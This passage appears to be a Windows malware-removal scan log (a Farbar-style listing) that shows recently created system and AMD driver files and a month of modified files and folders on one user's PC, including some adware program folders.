2015-08-19 00:05 - 2015-07-30 01:24 - 01561872 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2015-08-19 00:05 - 2015-07-30 01:23 - 00527952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2015-08-19 00:05 - 2015-07-30 01:21 - 00816576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2015-08-19 00:05 - 2015-07-30 01:17 - 01200400 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2015-08-19 00:05 - 2015-07-30 01:17 - 01025840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2015-08-19 00:05 - 2015-07-30 01:16 - 02147080 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9.dll
2015-08-19 00:05 - 2015-07-30 01:14 - 00333168 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFPlay.dll
2015-08-19 00:05 - 2015-07-30 01:09 - 01562968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2015-08-19 00:05 - 2015-07-30 01:06 - 01043872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2015-08-19 00:05 - 2015-07-30 01:05 - 02498808 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2015-08-19 00:05 - 2015-07-30 01:05 - 00501008 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2015-08-19 00:05 - 2015-07-30 01:04 - 01396064 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2015-08-19 00:05 - 2015-07-30 01:03 - 02116448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2015-08-19 00:05 - 2015-07-30 00:24 - 00252768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2015-08-19 00:05 - 2015-07-29 23:29 - 00705520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2015-08-19 00:05 - 2015-07-29 23:26 - 01867160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9.dll
2015-08-19 00:05 - 2015-07-29 23:26 - 00877016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2015-08-19 00:05 - 2015-07-29 23:25 - 01356368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2015-08-19 00:05 - 2015-07-29 23:25 - 00713312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2015-08-19 00:05 - 2015-07-29 23:24 - 01769056 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2015-08-19 00:05 - 2015-07-29 23:24 - 00445240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2015-08-19 00:05 - 2015-07-29 23:24 - 00285632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFPlay.dll
2015-08-19 00:05 - 2015-07-29 23:21 - 00962400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2015-08-19 00:05 - 2015-07-29 23:12 - 00287744 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2015-08-19 00:05 - 2015-07-29 23:12 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2015-08-19 00:05 - 2015-07-29 22:52 - 00859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2015-08-19 00:05 - 2015-07-29 22:52 - 00521216 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2015-08-19 00:05 - 2015-07-29 22:49 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2015-08-19 00:05 - 2015-07-29 22:46 - 02125312 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2015-08-19 00:05 - 2015-07-29 22:44 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2015-08-19 00:05 - 2015-07-29 22:44 - 00229376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2015-08-19 00:05 - 2015-07-29 22:42 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2015-08-19 00:05 - 2015-07-29 22:41 - 00407040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2015-08-19 00:05 - 2015-07-29 22:40 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2015-08-19 00:05 - 2015-07-29 22:38 - 01420288 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2015-08-19 00:05 - 2015-07-29 22:34 - 00599552 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2015-08-19 00:05 - 2015-07-29 22:29 - 00654848 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2015-08-19 00:05 - 2015-07-29 22:15 - 09889792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2015-08-19 00:05 - 2015-07-29 22:04 - 01714176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2015-08-19 00:05 - 2015-07-29 22:04 - 00335360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2015-08-19 00:05 - 2015-07-29 21:59 - 00473088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2015-08-19 00:05 - 2015-07-29 21:58 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2015-08-19 00:04 - 2015-08-12 23:20 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2015-08-19 00:04 - 2015-08-12 22:53 - 00311808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2015-08-19 00:04 - 2015-08-11 05:04 - 01087296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2015-08-19 00:04 - 2015-08-11 05:03 - 00442208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2015-08-19 00:04 - 2015-08-11 05:02 - 00080720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2015-08-19 00:04 - 2015-08-11 04:52 - 00993104 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2015-08-19 00:04 - 2015-08-11 04:26 - 00845664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2015-08-19 00:04 - 2015-08-11 04:21 - 00148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringservice.dll
2015-08-19 00:04 - 2015-08-11 04:21 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringclient.dll
2015-08-19 00:04 - 2015-08-11 04:20 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2015-08-19 00:04 - 2015-08-11 04:19 - 00235520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2015-08-19 00:04 - 2015-08-11 04:18 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2015-08-19 00:04 - 2015-08-11 04:11 - 00553472 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2015-08-19 00:04 - 2015-08-11 04:10 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-08-19 00:04 - 2015-08-11 04:10 - 00293376 _____ C:\WINDOWS\system32\TextInputFramework.dll
2015-08-19 00:04 - 2015-08-11 04:09 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2015-08-19 00:04 - 2015-08-11 04:08 - 00563200 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2015-08-19 00:04 - 2015-08-11 04:07 - 00593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2015-08-19 00:04 - 2015-08-11 04:07 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeParserTask.exe
2015-08-19 00:04 - 2015-08-11 04:05 - 00342016 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationGeofences.dll
2015-08-19 00:04 - 2015-08-11 04:05 - 00269312 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationFramework.dll
2015-08-19 00:04 - 2015-08-11 04:05 - 00137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationPermissions.dll
2015-08-19 00:04 - 2015-08-11 04:05 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationFrameworkInternalPS.dll
2015-08-19 00:04 - 2015-08-11 04:02 - 00621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2015-08-19 00:04 - 2015-08-11 04:02 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2015-08-19 00:04 - 2015-08-11 04:00 - 00336384 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2015-08-19 00:04 - 2015-08-11 04:00 - 00274432 _____ (Microsoft Corporation) C:\WINDOWS\system32\syncutil.dll
2015-08-19 00:04 - 2015-08-11 03:59 - 01106432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2015-08-19 00:04 - 2015-08-11 03:59 - 00642560 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdbui.dll
2015-08-19 00:04 - 2015-08-11 03:59 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2015-08-19 00:04 - 2015-08-11 03:59 - 00042496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tetheringclient.dll
2015-08-19 00:04 - 2015-08-11 03:58 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2015-08-19 00:04 - 2015-08-11 03:57 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2015-08-19 00:04 - 2015-08-11 03:50 - 00420352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe
2015-08-19 00:04 - 2015-08-11 03:50 - 00200704 _____ C:\WINDOWS\SysWOW64\TextInputFramework.dll
2015-08-19 00:04 - 2015-08-11 03:50 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2015-08-19 00:04 - 2015-08-11 03:49 - 00247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-08-19 00:04 - 2015-08-11 03:48 - 00671232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2015-08-19 00:04 - 2015-08-11 03:47 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2015-08-19 00:04 - 2015-08-11 03:39 - 00280576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2015-08-19 00:04 - 2015-08-11 03:38 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReInfo.dll
2015-08-19 00:04 - 2015-08-08 02:29 - 01822280 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-08-19 00:04 - 2015-08-08 02:01 - 01533496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-08-19 00:04 - 2015-08-08 01:48 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2015-08-19 00:04 - 2015-08-05 22:17 - 00200528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wof.sys
2015-08-19 00:04 - 2015-08-03 23:06 - 00243248 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2015-08-19 00:04 - 2015-08-03 22:23 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2015-08-19 00:04 - 2015-08-02 21:19 - 00393568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2015-08-19 00:04 - 2015-08-02 21:18 - 00594472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2015-08-19 00:04 - 2015-08-02 21:18 - 00046432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msgpiowin32.sys
2015-08-19 00:04 - 2015-08-02 21:17 - 00516960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2015-08-19 00:04 - 2015-08-02 21:17 - 00052264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wpcfltr.sys
2015-08-19 00:04 - 2015-08-02 20:31 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2015-08-19 00:04 - 2015-08-02 20:24 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModelShim.dll
2015-08-19 00:04 - 2015-08-02 20:22 - 00317440 _____ (Microsoft Corporation) C:\WINDOWS\system32\configmanager2.dll
2015-08-19 00:04 - 2015-08-02 20:21 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\coredpus.dll
2015-08-19 00:04 - 2015-08-02 20:19 - 00215040 _____ (Microsoft Corporation) C:\WINDOWS\system32\notepad.exe
2015-08-19 00:04 - 2015-08-02 20:19 - 00215040 _____ (Microsoft Corporation) C:\WINDOWS\notepad.exe
2015-08-19 00:04 - 2015-08-02 20:15 - 01290752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2015-08-19 00:04 - 2015-08-02 20:15 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2015-08-19 00:04 - 2015-08-02 20:15 - 00384000 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2015-08-19 00:04 - 2015-08-02 20:12 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEDataLayerHelpers.dll
2015-08-19 00:04 - 2015-08-02 20:06 - 00207872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\notepad.exe
2015-08-19 00:04 - 2015-08-02 20:02 - 00311808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2015-08-19 00:04 - 2015-07-30 01:15 - 00632168 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2015-08-19 00:04 - 2015-07-29 23:24 - 00407616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2015-08-19 00:04 - 2015-07-29 23:22 - 00896144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2015-08-19 00:04 - 2015-07-29 23:22 - 00507696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2015-08-19 00:04 - 2015-07-29 23:09 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerShellext.exe
2015-08-19 00:04 - 2015-07-29 23:08 - 00494592 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2015-08-19 00:04 - 2015-07-29 23:08 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2015-08-19 00:04 - 2015-07-29 23:08 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2015-08-19 00:04 - 2015-07-29 22:59 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2015-08-19 00:04 - 2015-07-29 22:52 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2015-08-19 00:04 - 2015-07-29 22:46 - 00487424 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2015-08-19 00:04 - 2015-07-29 22:46 - 00204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2015-08-19 00:04 - 2015-07-29 22:45 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2015-08-19 00:04 - 2015-07-29 22:45 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tunnel.sys
2015-08-19 00:04 - 2015-07-29 22:44 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsNativeApi.V2.dll
2015-08-19 00:04 - 2015-07-29 22:44 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2015-08-19 00:04 - 2015-07-29 22:44 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\VoiceActivationManager.dll
2015-08-19 00:04 - 2015-07-29 22:41 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationControllerPS.dll
2015-08-19 00:04 - 2015-07-29 22:38 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2015-08-19 00:04 - 2015-07-29 22:07 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2015-08-19 00:04 - 2015-07-29 22:06 - 00373248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2015-08-19 00:04 - 2015-07-29 22:06 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsNativeApi.V2.dll
2015-08-19 00:04 - 2015-07-29 22:06 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VoiceActivationManager.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-09-17 14:14 - 2010-08-18 02:46 - 00000000 ____D C:\ProgramData\Temp
2015-09-17 14:13 - 2011-01-31 22:11 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Skype
2015-09-17 14:09 - 2011-02-01 12:52 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\CrashDumps
2015-09-17 14:08 - 2013-03-16 03:58 - 00000346 _____ C:\WINDOWS\Tasks\HP Photo Creations Communicator.job
2015-09-17 14:03 - 2012-04-04 03:34 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2015-09-17 13:57 - 2015-06-21 12:44 - 00000934 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA.job
2015-09-17 13:53 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\sru
2015-09-17 13:51 - 2011-08-24 20:55 - 00000930 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-09-17 13:51 - 2011-08-24 20:55 - 00000926 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-09-17 13:47 - 2013-01-30 18:56 - 00000000 ____D C:\Users\Ken Terry\Documents\USAO docs
2015-09-17 13:19 - 2014-05-22 09:23 - 00000586 _____ C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-2815594105-2774959023-4293743994-1001.job
2015-09-17 12:25 - 2013-05-02 18:20 - 00000944 _____ C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA.job
2015-09-17 10:18 - 2015-07-28 13:48 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton Internet Security
2015-09-17 10:05 - 2015-07-10 07:22 - 00000275 _____ C:\WINDOWS\WindowsUpdate.log
2015-09-17 09:02 - 2011-06-15 21:23 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Clip Art Collection
2015-09-17 07:57 - 2009-07-13 21:34 - 00000576 _____ C:\WINDOWS\win.ini
2015-09-17 07:55 - 2015-06-04 18:14 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Raptr
2015-09-17 07:54 - 2013-05-13 11:04 - 00000000 ___RD C:\Users\Ken Terry\Dropbox
2015-09-17 07:54 - 2013-05-13 11:00 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Dropbox
2015-09-17 07:49 - 2015-08-11 19:30 - 00144368 ____N (CyberLink Corp.) C:\WINDOWS\system32\Drivers\rikvm_C6F09094.sys
2015-09-17 07:49 - 2015-07-10 07:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-09-17 07:49 - 2015-06-16 08:02 - 00000372 _____ C:\WINDOWS\Tasks\HPCeeScheduleForKen Terry.job
2015-09-17 07:48 - 2015-07-10 04:05 - 00131072 ___SH C:\WINDOWS\system32\config\BBI
2015-09-16 18:25 - 2013-05-02 18:20 - 00000922 _____ C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core.job
2015-09-16 18:00 - 2011-02-07 17:40 - 00000476 _____ C:\WINDOWS\Tasks\ParetoLogic Registration3.job
2015-09-16 16:57 - 2015-06-21 12:44 - 00000882 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core.job
2015-09-16 06:44 - 2015-06-04 18:14 - 00000000 ____D C:\Program Files (x86)\Raptr
2015-09-15 19:54 - 2015-08-11 19:36 - 00002262 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-09-14 18:24 - 2015-04-13 18:49 - 00003280 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForKen Terry
2015-09-14 18:24 - 2011-01-31 20:28 - 00000052 _____ C:\WINDOWS\SysWOW64\DOErrors.log
2015-09-14 13:46 - 2011-08-24 20:55 - 00003988 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-09-14 13:46 - 2011-08-24 20:55 - 00003756 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-09-14 12:21 - 2015-07-10 07:20 - 00024554 _____ C:\WINDOWS\setupact.log
2015-09-14 12:05 - 2014-11-24 09:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WeatherBug®
2015-09-14 02:00 - 2011-01-30 18:15 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Adobe
2015-09-13 10:43 - 2014-11-24 09:48 - 00000000 __HDC C:\ProgramData\{FA77A43D-F6ED-4924-87B5-517C061388C6}
2015-09-13 10:38 - 2015-08-11 18:59 - 00015954 _____ C:\WINDOWS\PFRO.log
2015-09-13 09:18 - 2015-07-10 04:05 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM
2015-09-13 09:15 - 2015-08-11 19:07 - 00000000 ____D C:\Users\Ken Terry
2015-09-13 06:47 - 2013-05-22 16:32 - 00000000 ____D C:\Program Files (x86)\SingAlong
2015-09-13 06:45 - 2015-07-22 08:39 - 00000000 ____D C:\Program Files\daugava
2015-09-13 06:45 - 2013-11-24 20:34 - 00000000 ____D C:\Program Files (x86)\Protected
2015-09-13 06:45 - 2012-12-16 17:04 - 00000000 ____D C:\Program Files (x86)\VideoConverter
2015-09-13 06:45 - 2011-06-15 21:25 - 00000000 ____D C:\Program Files (x86)\EZ Cards Creator
2015-09-12 13:08 - 2015-01-18 16:44 - 00000000 ____D C:\Program Files (x86)\EliteUnzip
2015-09-12 13:06 - 2013-06-05 09:02 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\TidyNetwork.com
2015-09-12 13:06 - 2013-06-05 09:01 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\UnitLayers
2015-09-12 13:05 - 2013-06-05 09:02 - 00000000 ____D C:\Program Files (x86)\WebCake
2015-09-12 13:05 - 2013-06-05 09:01 - 00000000 ____D C:\Program Files\Updater By SweetPacks
2015-09-10 10:11 - 2015-07-10 05:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-09-10 07:40 - 2011-08-24 20:55 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Google
2015-09-04 09:44 - 2011-01-30 17:26 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\PDFC
2015-09-02 15:02 - 2012-10-09 13:55 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Mozilla
2015-09-01 11:35 - 2013-11-01 10:54 - 00000000 ____D C:\Users\Ken Terry\Documents\Ken Medical
2015-09-01 06:03 - 2011-03-05 17:04 - 00000000 ____D C:\Program Files (x86)\Steam
2015-08-29 03:31 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-08-22 11:42 - 2011-01-30 17:18 - 00101544 _____ C:\Users\Ken Terry\AppData\Local\GDIPFONTCACHEV1.DAT
2015-08-21 13:12 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\rescache
2015-08-21 07:39 - 2015-08-11 19:04 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2015-08-21 07:36 - 2015-06-04 18:43 - 00000000 ____D C:\AMD
2015-08-21 07:35 - 2015-07-16 02:12 - 00162240 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiuxp64.dll
2015-08-21 07:35 - 2015-07-16 02:12 - 00111832 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 12062040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atidxx64.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 10191264 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atidxx32.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 08979760 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd6a.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 08865496 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd64.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 08009344 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdva.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 07482560 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdag.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 01468224 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 01213192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 00143048 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiuxpag.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 00131592 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiu9p64.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 00113880 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiu9pag.dll
2015-08-21 07:35 - 2015-07-16 02:06 - 21632992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmdag.sys
2015-08-21 07:35 - 2015-07-16 02:00 - 39723504 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl.dll
2015-08-21 07:35 - 2015-07-16 01:57 - 22328800 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl12cl.dll
2015-08-21 07:35 - 2015-07-16 01:17 - 00681456 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2015-08-21 07:35 - 2015-07-16 01:17 - 00452576 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2015-08-21 07:35 - 2015-07-16 01:17 - 00256992 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2015-08-21 07:35 - 2015-07-16 01:13 - 01257952 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2015-08-21 07:35 - 2015-07-16 01:13 - 00936928 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2015-08-21 07:35 - 2015-07-16 01:13 - 00675296 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmpag.sys
2015-08-21 07:35 - 2015-07-16 01:13 - 00152032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2015-08-21 07:35 - 2015-07-16 01:12 - 00874480 _____ (AMD) C:\WINDOWS\system32\coinst_15.20.dll
2015-08-21 05:34 - 2015-08-11 19:06 - 01006528 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-08-20 13:34 - 2015-07-10 07:20 - 04988600 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-08-20 13:33 - 2013-03-14 03:02 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2015-08-20 13:33 - 2013-03-14 03:02 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\Provisioning
